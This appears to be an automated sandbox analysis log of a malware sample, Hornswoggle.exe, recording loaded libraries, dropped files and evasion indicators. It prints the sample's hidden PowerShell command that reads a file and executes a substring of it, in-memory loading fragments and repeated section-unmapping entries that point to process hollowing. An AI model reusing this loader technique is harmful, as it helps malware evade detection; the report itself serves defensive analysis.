    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: edgegdi.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: oleacc.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: version.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: shfolder.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: textshaping.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: justifikationssager.lnk.0.dr LNK file: ..\..\..\..\..\Filial195.plo
    Source: Window Recorder Window detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: Hornswoggle.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: stem.Core.pdbD source: powershell.exe, 00000002.00000002.23289519078.0000000008B80000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.23291511273.0000000009400000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    Source: Yara match File source: 00000002.00000002.23291877014.000000000C190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Millionvises $Slumberproof $Konfiskabel), (Marred @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Kontorsystemernes = [AppDomain]::CurrentDomain.GetAssembl
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Shortpassings)), $Elisabeth).DefineDynamicModule($Lodowick110, $false).DefineType($Rakkerkulers, $Begribeliges, [System.MulticastDeleg
    Source: C:\Users\user\Desktop\Hornswoggle.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04FBA3B8 push eax; mov dword ptr [esp], edx 2_2_04FBA3CC
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07AD4E03 push eax; retf 2_2_07AD4E19
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_07AD0CB9 push eax; ret 2_2_07AD0CCE
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_098134D0 push 8BD38B50h; iretd 2_2_098134D6
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0984559D push edi; iretd 2_2_098455B2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_09844DF2 push edx; iretd 2_2_09844DF4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_09842110 push esi; ret 2_2_09842156
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_09843B38 push D7802852h; retf 2_2_09843B3D
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0984394A push dword ptr [edx]; retf 2_2_09843979
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_09842356 push cs; retf 2_2_0984235D
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_098432B3 push ebp; iretd 2_2_098432CB
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_09843ECF push esi; iretd 2_2_09843EDB
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0984485E pushad ; iretd 2_2_0984486A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_09841667 push ss; retf 2_2_0984166A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_09842273 pushfd ; ret 2_2_09842278
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_09844878 pushad ; iretd 2_2_0984486A
    Source: C:\Users\user\Desktop\Hornswoggle.exe File created: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\nsExec.dll

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Users\user\Desktop\Hornswoggle.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9872
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\nsExec.dll
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_00406167 FindFirstFileA,FindClose
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_00402688 FindFirstFileA
    Source: ModuleAnalysisCache.2.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter@\
    Source: ModuleAnalysisCache.2.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter@\
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter@\
    Source: ModuleAnalysisCache.2.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Users\user\Desktop\Hornswoggle.exe | API call chain: ExitProcess graph end node (graph_0-3488)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04ACD6F8 LdrInitializeThunk
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section unmapped: unknown base address: 400000
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
